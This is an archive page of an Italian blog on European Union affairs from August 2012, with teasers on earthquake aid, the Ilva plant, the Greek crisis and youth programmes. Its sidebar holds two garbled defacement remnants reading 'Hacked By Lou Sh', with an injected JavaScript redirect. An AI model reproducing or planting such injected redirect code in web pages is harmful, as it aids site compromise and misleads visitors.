EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Agosto 2012
it

L'aiuto 'de minimis' non necessita dell'autorizzazione della Commissione europea. Il provvedimento abbatte le barriere della burocrazia, ma non entusiasma il Governatore emiliano Errani, che si oppone alla completa defiscalizzazione della regione colpita dal sisma.

Secondo il Commissario europeo per la Concorrenza Joaquin Almunia, i territori emiliani colpiti dal sisma nei mesi di maggio e giugno, nei prossimi tre anni potranno giovarsi di un’esenzione fiscale inferiore a 200mila euro. Il provvedimento è rivolto alle imprese e considerato un aiuto ’de (...)

it

Lussemburgo, Londra, Strasburgo e Bruxelles non sono solo alcune delle città più multietniche del mondo ma sono anche le possibili mete di un’esperienza indimenticabile dal punto di vista professionale e culturale. Si tratta di un’occasione che tutti i laureandi e i laureati, alla ricerca di stage retribuiti al di là dei confini nazionali, non possono assolutamente perdere. Ad organizzare tali stage è l’Associazione Scambieuropei, sorta tra il 2009 e il 2010, il cui obiettivo è quello di promuovere tra i giovani la possibilità di di vivere esperienze all’estero.

Ma cosa sono gli Scambi europei? Si tratta di progetti che mirano a sviluppare l’apprendimento all’intercultura attraverso scambi tra gruppi di giovani appartenenti a diversi paesi Europei e non solo. Tali progetti sono finanziati dal Programma comunitario noto come “Gioventù in Azione”e prevedono (...)

it

La rappresentanza europea del Regno Unito in particolare ha assunto il controllo delle operazioni, considerando questo come uno step fondamentale verso una maggiore integrazione ed una maggiore conoscenza delle persone che continuamente si spostano tra i vari paesi per questione lavorative o semplicemente per fare dei viaggi turistici. Particolare attenzione è posta verso i social network, i quali tramite la loro continua capacità di divulgazione possono far si che molte persone possano venire attratte da qualcosa che neanche loro sapevano avesse importanza fino a poco tempo prima.

Modificare la politica, trovare un compromesso che possa far coesistere tutti gli appartenenti agli stati membri in maniera ordinata. Questi sono gli obiettivi che un sano cittadino europeo dovrebbe porsi per rendere il proprio continente, il vecchio continente, un luogo migliore. E quale (...)

it

Il conflitto siriano sta dettando le priorità dell'agenda politica dei Ventisette, che mirano ad aiutare le popolazioni coinvolte nella guerra civile e ad emarginare Assad.

Il Consiglio affari esteri riunito a Bruxelles ha deliberato lo stanziamento di 20 milioni di euro destinato alla popolazione siriana, martoriata dalla guerra civile in atto nello Stato del Medio Oriente, e l’inasprimento delle sanzioni contro il regime. L’aiuto è rivolto anche ai Paesi vicini, (...)

it

"On The Move" giunge alla sua sesta edizione. Il creative contest, promosso dalla Fondazione Pubblicità Progresso, anche in questo 2012 fa appello alla fantasia dei giovani. Ai partecipanti è richiesto di immaginare di essere catapultati nel futuro e precisamente nel 2021, anno in cui la Fondazione festeggerà il suo cinquantesimo compleanno. Una volta compiuto il salto temporale, gli iscritti al concorso dovranno rimettere in moto la creatività e fingersi dei giornalisti o dei pubblicitari, alle prese con la produzione di materiale divulgativo proprio per conto di Pubblicità Progresso.

Quali sono gli obiettivi del contest? La Fondazione Pubblicità Progresso intende innanzitutto ascoltare i suggerimenti e le proposte dei giovani, inoltre ha lo scopo di diffondere la comunicazione sociale e rendere noto il nome della Fondazione presso questa fascia d’età. Chi può partecipare? (...)

it

Bruxelles ha deciso di intervenire nelle cittadine colpite dal terremoto lo scorso 20 e 29 maggio in Emilia, Lombardia e Veneto, per “accelerare la ripresa economica” in una delle aree più produttive e competitive del paese, che conta da sola il 2% del pil italiano. Aiuti supplementari sono attesi per la fine dell’anno dal Fondi di Solidarietà Ue.

Oltre ai danni materiali sugli edifici, si aggiungono i danni di natura economica, in primis riguardo alla produzione del celeberrimo parmiggiano reggiano. Si stimano danni globali intorno ai 500 milioni di euro. Il Senato ha approvato il 1 Agosto con voto di (...)

it

L’Ilva di Taranto, considerata da sempre la più grande fonte di produzione in Europa, rischia di chiudere. Ancora una volta la causa è da rinvenire nel forte inquinamento che la stessa azienda produce. La dispersione di piombo sembra non diminuire e a testimoniarlo sono state le analisi condotte su 141 individui. Ridurre l’inquinamento ambientale con il sequestro dell’Ilva provocherebbe un forte calo dell’occupazione, ed è questo che ha portato nelle piazze tarantine numerosi lavoratori impegnati in continue e attive proteste.

Il caso Ilva Ilva A Taranto si combatte l’inquinamento ambientale provocato dagli stabilimenti dell’Ilva. Si propone il sequestro, ma crescono le proteste dei lavoratori, sempre più consapevoli di incorrere il rischio della (...)

it

E' proprio notizia di questi giorni (8 agosto) l'intervento dei i carabinieri del Nas di Torino che hanno ritirato circa duemila pistole spara-bolle. Il tutto dopo la denuncia di una madre che aveva visto i propri figli cadere vittima di sintomi influenzali immediatamente dopo aver utilizzato gli oggetti in questione. Al loro interno è stato trovato un sapone inquinato da diversi ceppi batterici, i quali avrebbero causato la condizione febbricitante dei due fratellini. Purtroppo questo è solo uno dei tanti esempi che possiamo citare. Come se l'Unione europea avesse previsto tutto, ecco ad inizio agosto spuntare questo divertente video che tende a sensibilizzare i grandi ed i bambini riguardo il problema "sicurezza giocattoli".

Le norme che i costruttori di giocattoli dovranno rispettare si fanno sempre più rigide. La colpa è di coloro che continuano a produrre balocchi in quantità industriale ma anche pericolosa. Non c’è tempo per svolgere un lavoro adeguato, per rispettare le norme, l’importante è soltanto il profitto. (...)

it

Alla vigilia dei weekend da “bollino nero” la Commissione europea ha stilato dieci semplici regole per evitare che la vacanza tanto agognata si trasformi in un incubo.

Il Vicepresidente della Commissione europea Antonio Tajani ha presentato il decalogo per il turista europeo, contenente consigli e raccomandazioni rivolti ai cittadini dell’area Ue per viaggiare in totale sicurezza. Tale misura rientra tra le iniziative adottate dalla Commissione per promovere (...)

it

E' già dal 2004 che la Tessera Europea di Assicurazione Malattia (TEAM) è stata introdotta in Italia, come in molti altri paesi membri dell'UE. Forse però, non tutti i cittadini sanno di esserne già in possesso. La TEAM infatti, è stampata sul retro della nostra Tessera Sanitaria Nazionale (TSN), o per gli abitanti di Lombardia, Friuli Venezia Giulia e Sicilia sulla parte posteriore della Carta Regionale dei Servizi.

La tessera, totalmente gratuita e rilasciata nel nostro Paese dal Servizio sanitario nazionale (SSN), ha una validità di sei anni dal suo rilascio. Chi la possiede ha il diritto di ricevere l’assistenza medica necessaria (dunque sia servizi ospedalieri, clinici o farmaceutici), erogata dai (...)

it

Da oltre due anni l’UE richiede agli Stati membri normative per lo sviluppo di un mercato digitale avanzato. Nonostante le iniziative di vari Ministri, l’Italia non si è ancora allineata alla media degli altri Paesi europei.

L’Agenda digitale europea, presentata in una comunicazione della Commissione europea nel maggio 2010, è stata istituita con lo scopo di migliorare la produttività e quindi la ricchezza dei Paesi UE sfruttando al meglio il potenziale sociale ed economico della tecnologia. Potremo pensare che il (...)

it

Cattive notizie per il nostro Paese: la Commissione europea ha infatti reso nota una relazione che classifica i 27 Stati membri sulla base di 18 criteri volti a valutare le performance di ciascun Paese in tema di gestione dei rifiuti urbani. La relazione servirà per stilare delle tabelle di marcia rivolte ai dieci Stati che hanno registrato i risultati peggiori – tra i quali figura l’Italia, classificatasi ventesima – di cui si discuterà a partire da quest’autunno con le autorità nazionali di riferimento in seminari bilaterali. Il primo appuntamento è fissato per il 19 settembre a Praga.

Sarà per via dell’atmosfera olimpica che si continua a respirare nonostante la conclusione dei giochi, o per il semplice gusto di stilare le classifiche più strane da dare in pasto a settimanali di gossip e blog vari, sta di fatto che sembra essere scattata una vera e propria podio mania. E così (...)

it

Il progetto si presenta come il primo realizzato da Enel Foundation in collaborazione con la Fondazione CRUI. Gli obiettivi principali sono stati enunciati dal Presidente della Fondazione CRUI, Marco Mancini, il quale parla del progetto come un punto di incontro tra due “mission” che la stessa Fondazione intende perseguire da tempo: la valorizzazione del talento dei nostri giovani e dei progetti di ricerca finalizzati a incentivare lo sviluppo del Paese. Lo stesso presidente ha, inoltre, dichiarato che “la collaborazione con grandi aziende per raggiungere obiettivi ambiziosi deve diventare sempre di più un paradigma sul quale impostare la collaborazione fra il sistema delle Università e della Ricerca e il tessuto produttivo”.

Energie per la ricerca La Fondazione Centro Studi Enel e la Fondazione CRUI hanno promosso un nuovo bando di concorso per 20 premi di ricerca nei campi delle fonti rinnovabili, dell’impatto economico della produzione energetica e della responsabilità sociale dell’impresa. L’obiettivo del progetto (...)

it

Josephin, Julian, Federico. Le vite di questi ragazzi segnano il filo rosso lungo in quale scorrono le sequenze che compongono “Young Europe”. Il film, diretto da Matteo Vicino, è stato presentato lo scorso luglio al Giffoni Film Festival. “Young Europe” potrebbe a prima vista sembrare uno di quei tanti film corali sulla giovinezza, che riempiono le nostre sale cinematografiche. Ma non è affatto come sembra.

La genesi del film è piuttosto articolata. Il lungometraggio, vincitore tra l’altro del premio alla Miglior Regia all’interno del Film Festival Internazionale di Milano (MIFF), è la trasposizione cinematografica del libro omonimo, di cui è autore lo stesso Vicino. Il volume (edito nel 2010 da (...)

it

Sono giorni caldissimi per il futuro della Grecia, con il famigerato default e l'uscita dall'euro da scongiurare. Si susseguono i vertici tra i maggiori esponenti politici europei, che lavorano per scongiurare il ritorno della dracma ad Atene.

Il Ministro greco delle Finanze, Yannis Stournaras, ha affermato che la Grecia “deve restare nella zona euro” per evitare il rischio di precipitare in una miseria mai registrata prima. Pericolo povertà Duro monito lanciato da Stournaras, secondo il quale è concreto il rischio di una miseria (...)

it

Lo scorso febbraio i cechi subiscono la sospensione dell'invio delle sovvenzioni europee, dopo che la Commissione constata delle anomalie negli audit inviati a Bruxelles. Le irregolarità riguardano il trattamento da parte dell'amministrazione ceca dei Fondi europei a gestione indiretta.

Ue e Repubblica Ceca. L’adesione all’Unione Europea risale al 1° maggio 2004. Cosa sono i Fondi a gestione indiretta? Si tratta sostanzialmente di risorse economiche del bilancio dell’Unione europea, la cui gerenza è affidata agli Stati membri attraverso le (...)

it

“Allargare l’istruzione – una proposta per un’iniziativa europea mirata a migliorare l’istruzione e lo sviluppo delle competenze attraverso le nuove tecnologie” È questa l’ultima consultazione lanciata dalla Commissione europea e che si pone come obiettivo quello “di approfondire l’esigenza percepita di un’azione UE per promuovere l’utilizzo di risorse didattiche innovative - Open Educational Resources (OER) - nel settore dell’istruzione”.

L’avvento di internet e l’esplosione delle nuove tecnologie dell’informazione e della comunicazione – comunemente chiamate ICT, acronimo che sta per Information and Communication Technology – stanno letteralmente cambiando tutti gli aspetti della nostra vita: dal nostro modo di lavorare e di fare (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato



Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France